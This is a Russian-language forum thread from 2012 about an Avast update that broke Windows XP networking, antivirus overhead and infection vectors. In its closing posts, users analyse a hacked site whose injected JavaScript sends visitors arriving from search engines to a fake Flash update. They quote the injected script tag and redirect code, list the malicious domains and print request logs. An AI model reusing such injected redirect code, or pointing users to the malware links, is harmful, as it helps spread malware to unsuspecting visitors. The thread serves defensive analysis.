[Butch3r]

По нашей статистике пострадали лишь нелицензионные Windows XP (Zver Edition, например). Кто-нибудь пострадал на лицензионной Windows XP?

 

Поскольку всё выглядит как-раз наоборот: Avast единственный антивирус, заметивший попытку создания огромного ботнета. А его все хаят.

 

Очень интересен данный вопрос.

полная чушь. Это лишь очередное подтверждение что аваст дерьмо и работает для галочки. Пострадали абсолютно все XP, и сборки и не сборки. Лично воспроизвел это на чистой винде. Наш Контакт центр чуть не повешался. Радует 1но - после этого его хоть ставить меньше будут.

[stas_k]

По нашей статистике пострадали лишь нелицензионные Windows XP (Zver Edition, например). Кто-нибудь пострадал на лицензионной Windows XP?

 

Поскольку всё выглядит как-раз наоборот: Avast единственный антивирус, заметивший попытку создания огромного ботнета. А его все хаят.

 

Очень интересен данный вопрос.

 

Берем N+1 компьютеров (для простоты на физический хост, ставим ESXi и на нем создаем виртуалки) устанавливаем на все компьютеры лицензионный windows XP. Различие будет одно - на первом windows без антивруса вообще. на втором с касперским. на третьем с авастом, дрвебом, симантеком, и тд.

Всё ПО ставится из коробки. То есть с родного CD microsoft, родного CD из коробки антиврусника. Больше никакого ПО ставить нельзя.

По условиям эксперимента разрешается сходить на сайт обновлений винды и антивриусника.

 

Весь трафик этих машин мониторим и пишем в лог. Оставляем и на время забываем. Вообще не трогаем.

Через месяц (30 календарных дней) вдумчиво анализируем кто куда ходил и зачем.

 

Мне в этом вопросе обычно никто не верит "на слово". Зато получив собственные логи оппоненты вопросы снимают.

Там совсем не сложно сравнить лог от чистой винды и винды с "антиврусом".

[lomal]

кардинальная борьбы с вирусами: нет интернета - нет вирусов :)

агащас. а флешка с фоткаме из отпуска побывавшая уже у ярда юзеров не считается? можно конечно отключить usb, но я помню cdr с на заводе прошитым вирусом. а давайте отключим cdrom! а про вирус в bios забыли? щас вон и телевизор бывает возмущается - "а чо это интернет отвалился?" получается нет смысла бороться с вирусами, надо учиться с ними жить.

Зачем отключать весь cdrom? Достаточно отключить автозапуск. Зачем учиться жить с вирусами, это доставляет удовольствие?

[Nag]

Наш Контакт центр чуть не повешался. Радует 1но - после этого его хоть ставить меньше будут.

Знакомая с Украины 3 дня без инета из-за аваста сидела. А у нее работа - через интернет...

[KaraVan]

Ребята, лучший антивирус это отсутствие административных привилегий в повседневной работе(или нормально работающий UAC).

[yegorov-p]

С другой стороны после фейла аваста число установок дрвебов по подписке увеличилось, приятно =)

[azhur]

В офисе - да. А вот дома без админских прав игры часто не пашут. Как то пробовал "огородить" комп родственникам. Не вышло. Сидят под админами...

Ещё не встретил ни одной игры, которая не работала бы без админских прав (антиквариат не считаем).

Правда иногда админские права нужны не только для установки, но и для первого запуска (факинг ДРМ!).

Игры ставятся на диск D:, на который у пользователя полные права, плюс семёрочный UAC для запуска инсталлера "от админа" - уже с год полёт нормальный.

"Для галочки" стоит AVG, но ниразу ничего кроме кейгенов-кряков и т.п. и авторанов на флешке он не поймал.

[Ivan_83]

Может имел в виду НЕ отжирает ? У меня 5 мегабайт MSE занимает судя по диспетчеру задач, во всех режимах работы, то есть в фоне, с открытым окном, с открытым окном и сканированием.

На ХР точно отжирает от 250мб и больше, на семёрках не смотрел / не помню, там памяти обычно много и проц мощный.

Там жрёт не гуяшная морда, а служба: mpeng (или как то так, её видно при копировании файлов как жруна процессора).

 

А не надо такие программы держать на дисках :)

Вот ещё, будут всякие мне указывать. Вот я и не держу антивирусов.

 

 

В офисе - да. А вот дома без админских прав игры часто не пашут. Как то пробовал "огородить" комп родственникам. Не вышло. Сидят под админами...

Дома тоже не сложно.

Есть простые рекомендации:

- новые игрушки (после 2006 года);

- ставить в папку в своём профиле (куда полный доступ);

- уровень пользователя - выше среднего.

Я лично патчил старые (2000 - 2005) игры чтобы без прав админа пахали. Большинству хватало полного доступа на отдельные файлы/подпапки из своей папки и на ветки реестра в HKLM где игрушка хранит свои настройки. Чтобы вечно не давать права на реестр я в бинарнике менял константу "ПОЛНЫЙ ДОСТУП" на "ДОСТУП НА ЧТЕНИЕ" в аргументе функции открытия ключа в реестре. Обычно 3-5 замен в бинарнике.

Ещё был вариант поменять HKLM на HKCU, но это менее кошерно.

С переездом на х64 семёрку (или 2к3 сервер) некоторые старые игрушки перестали работать, не смотря на все мои попытки.

[Картуччо]

На ХР точно отжирает от 250мб и больше, на семёрках не смотрел / не помню, там памяти обычно много и проц мощный.

Там жрёт не гуяшная морда, а служба: mpeng (или как то так, её видно при копировании файлов как жруна процессора).

MsMpEng

в простое 40 МБ, при сканировании прыгало до 90, но большую часть времени держалось на 60.

[Butch3r]

MSE мы ставим у себя в офисе, работает сносно. В виду того, что все за натом - от виросов не страдаем. Сколько он кушает не мониторили - но народ не жалуется на тормоза (а компы у многих ещё на 478 сокете:) )

[Gecxjo]

Странно, у меня нет проблем. Ставил этот антивирь многим друзьям, вроде не жаловались...

Да и на мой взгляд работает вполне нормально, тормозов нет. А вот раньше когда был лиц. "КАсперыч", были тормоза.

[Red911]

Странно, у меня нет проблем. Ставил этот антивирь многим друзьям, вроде не жаловались...

Да и на мой взгляд работает вполне нормально, тормозов нет. А вот раньше когда был лиц. "КАсперыч", были тормоза.

какой именно касперский?

[Ivan_83]

MSE мы ставим у себя в офисе, работает сносно. В виду того, что все за натом - от виросов не страдаем. Сколько он кушает не мониторили - но народ не жалуется на тормоза (а компы у многих ещё на 478 сокете:) )

Даже с гигом памяти на 1,7 целероне (478) под ХР работать практически не возможно - ацкие тормоза, выжирает проц.

Если меньше гига - система постоянно свопит.

Но это проблема не антивируса, а сама система слабая.

На двуядерниках с 2гб оперативы тормоза от антивируса слабо заметны. (если не копировать большие архивы %) )

 

Для тех кто не в курсе.

Основные способы заражения:

- баннер-реддирект на сайт которые сканит на дыры и суёт эксплоиты, обычно они ориентируются на дырки в акробате и суют пдф специально составленные (притом может вполне приличный сайт быть с которого через баннерную систему каждого n-го посетителя пробует инфецировать, либо хостинг ломается и в шаблоны дописывается хитрый саморасшифровывающийся джаваскрипт);

- всякие обманки: типа загрузчик очень нужного и редкого файла, которого больше нигде нет, или просто кино скачать;

- флешки и прочие съёмные носители.

 

Да, есть ещё вирусы которые сканят по ип в поисках дырявых сервисов или открытых шар, если шара находится то там заражаются ехе файлы. Но это редкость, из за натов и дефолтных настроек ппп соединений.

[karpa13a]

сканят по ип в поисках дырявых сервисов или открытых шар,

дневной список уникальных ипешнигов откуда ломились показать?)

на ссх для начала.

про всякие сканеры веб-дыр и подборки для вордпресса - пока умолчим. тысячи и тысячи попыток. если нет авто-блокираторов.

 

про умных админов рассказывать не надо.

[Ivan_83]

На венде нет ссш, и веб сервера.

У меня нет автоблокираторов, зато есть в инете и ссш и веб, не сказать что сильно напрягают. Ещё по рдп ломятся, но тоже толку с них мало.

И сколько ваши ломщики составляют от адресного пространства ипв4? 0,0001%?)

[karpa13a]

0,0001%?)

ну тут вопрос же не в том сколько ломщиков и сколько серверов наломают

 

тут вопрос в том какая популярность у этих серверов. а там уже всё зависит от.

[PetrN]

К вопросу мозгов и антивируса

перейдите по первой ссылке http://yandex.ru/yandsearch?text=1%D0%B0%D0%B0%D1%81&lr=45

переходит на подложный сайт, данный подложный сайт редиректится только при переходе с поисковика.

https://www.virustotal.com/file/96b2ac92e33b97d6077327f191f7863fde5d1df720f47b34ab9c0b921546d89c/analysis/1355252466/

ловит 9 штук тока , 6 часов прошло как отправил касперскому , 0 эмоций

примоеденяюсь к высказыванием по поводу не панацеи антивируса и ограниченных прав пользователя.

 

Зы: по первой ссылке трояна скачать можно.

[sherwood]

перейдите по первой ссылке

да, редиректит на подложный сайт где тут же просит обновить адобе флеш плеер, была бы винда словил бы точно что нибудь.

по прямому адресу заходит нормально.

да, то же много звонков, все ХР и не имеет значение пиратка или лицензия, было несколько звонков с видовс 7 как бы протокол был цел в отличии от ХР где были пустые поля в свойствах, но инет не работал, после обновления аваста все работало.

 

Да! Читайте, устаревший вы наш: http://yandex.ru/yan...955453&lr=11453

что правда? а что теперь делать? и когда они появились? а то я сижу в своей деревне и не чего не знаю, как раньше сидел под ХР так сейчас под линукс и что то как то не получается что то словить с инета, может они (вирусы) до моей деревне не доходят? и по первой ссылке как то прошел и ни чего не заметил. ну да редирек, ну да просит обновить, а оно мне зачем? у меня стоит и работает, может не последней версии, а зачем она последняя если баги не обнаружил в этой.

вообще то есть некий вредоносный код, но его еще надо запустить у себя в системе что бы что то попортить, а так все вирусы это от wine, даже порно банеры не обходят стороной того кто под wine юзает мозилу.

да, аваст немного попортил нервы, причем большая часть абонентов считает что проблема на стороне провайдера.

[PetrN]

была бы винда словил бы точно что нибудь.

если быть дебилом то да.

это как в анекдоте — У меня вчера друг сервак сломал. — Он что хакер? — Нет, он — ***к.

 

 

по прямому адресу заходит нормально.

как не спецу интересно, сайт взломан ? , банеров, левых, вроде как нет.

[sherwood]

У меня вчера друг сервак сломал. — Он что хакер? — Нет, он — ***к.

это точно :) :) :)

 

как не спецу интересно, сайт взломан ?

как не спец не спецу, конечно ломанули, и именно когда вы приходите редиректом с другого сайта например с поисковика то срабатывает подложка, если вы напрямую набираете адрес то нет, так как это рассчитано на не опытных пользователей которые очень часто пользуются поисковиками для того что бы найти тот или иной адрес, тот кто постоянно пользуются одними и теми же ресурсами то запомнить url думаю не сложно, тем более хром если что подскажет. в хроме в адресной строке если начать набирать адрес 1ааа то редирект не срабатывает, при чем в кеше нет этого сайта (так как на той машине что пробовал еще этот сайт не открывался), если прыгнуть с сайта google.ru то то же самое, получаем подложку.

Изменено 11 декабря, 2012 пользователем sherwood

[Alek Aaz]

Настучать по ручкам паршивцу...

 

WHOIS information for locz.ru:***

 

[Querying whois.ripn.net]

[whois.ripn.net]

% By submitting a query to RIPN's Whois Service

% you agree to abide by the following terms of use:

% http://www.ripn.net/about/servpol.html#3.2 (in Russian)

% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: LOCZ.RU

nserver: ns1.sweel.ru.

nserver: ns2.sweel.ru.

state: REGISTERED, DELEGATED, VERIFIED

 

person: Private Person

registrar: REGRU-REG-RIPN

admin-contact: http://www.reg.ru/whois/admin_contact

created: 2012.06.06

paid-till: 2013.06.06

free-date: 2013.07.07

source: TCI

Last updated on 2012.12.12 04:51:33 MSK

[Ivan_83]

К вопросу мозгов и антивирусаперейдите по первой ссылке http://yandex.ru/yan...%B0%D1%81&lr=45переходит на подложный сайт, данный подложный сайт редиректится только при переходе с поисковика.

Красота, люблю такие штуки изучать, прям квест :)

Там в конце хтмл дописано:

 

<script type="text/javascript" src='http://in-disquise.com/jquery.js'></script>
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script>

и уже тот скрипт проверяет наличие редиректа с поисковиков и шлёт дальше

document.location.href=('http://dnnn.ru/?dle&hostname='+hostname+'&fullpath='+fullpath);

и вероятно там ещё дальше могут слать...

Эта цепочка трафика, обратно по цепочке идёт бабло за переходы и инсталяции.

 

https://www.virustot...sis/1355252466/ловит 9 штук тока , 6 часов прошло как отправил касперскому , 0 эмоций

И?

У меня есть не новые вирусы, которые половина из этого списка не определяет.

И другие старые вирусы, которые другая половина определяет а первая нет.

Потому болт на антивирусы, это не серьёзно.

 

Настучать по ручкам паршивцу...

Их там не один...

[Pritorius]

что правда? а что теперь делать? и когда они появились? а то я сижу в своей деревне и не чего не знаю, как раньше сидел под ХР так сейчас под линукс и что то как то не получается что то словить с инета...

 

Блаженны...

[GateKeeper]

по прямому адресу заходит нормально.

как не спецу интересно, сайт взломан ? , банеров, левых, вроде как нет.

Зайди на сайт, открой исходник и мотай до последних 2 строчек.

[Ivan_83]

Цепочка доменов которые используются для впаривания зловредов с этого сайта:

in-disquise.com
dnnn.ru
dddl.ru
locz.ru
cddd.ru
jjjo.ru

dddl.ru - для тех кто с мобильного, там развод на платные смс.

 

"in-disquise.com" "GET /jquery.js HTTP/1.1" 200 1937 "http://www.1aas.ru/"
"dnnn.ru" "GET /?dle&hostname=www.1aas.ru&fullpath=www.1aas.ru/ HTTP/1.1" 302 0 "http://www.1aas.ru/"
"www.1aas.ru.locz.ru" "GET /?site=www.1aas.ru/ HTTP/1.1" 302 2545 "http://www.1aas.ru/"
"www.1aas.ru.locz.ru" "GET /? HTTP/1.1" 200 2545 "http://www.1aas.ru/"
"www.1aas.ru.locz.ru" "GET /important.css?v=382 HTTP/1.1" 200 1012 "http://www.1aas.ru.locz.ru/?"
"adobe.jjjo.ru" "GET /rast/js/jquery.simplemodal.js HTTP/1.1" 200 9769 "http://www.1aas.ru.locz.ru/?"
"adobe.jjjo.ru" "GET /rast/js/jquery.js HTTP/1.1" 200 92555 "http://www.1aas.ru.locz.ru/?"
"adobe.jjjo.ru" "GET /rast/images/contentheader_topshadow.png HTTP/1.1" 200 974 "http://www.1aas.ru.locz.ru/important.css?v=382"
"adobe.jjjo.ru" "GET /rast/images/flash_128.jpg HTTP/1.1" 200 16137 "http://www.1aas.ru.locz.ru/important.css?v=382"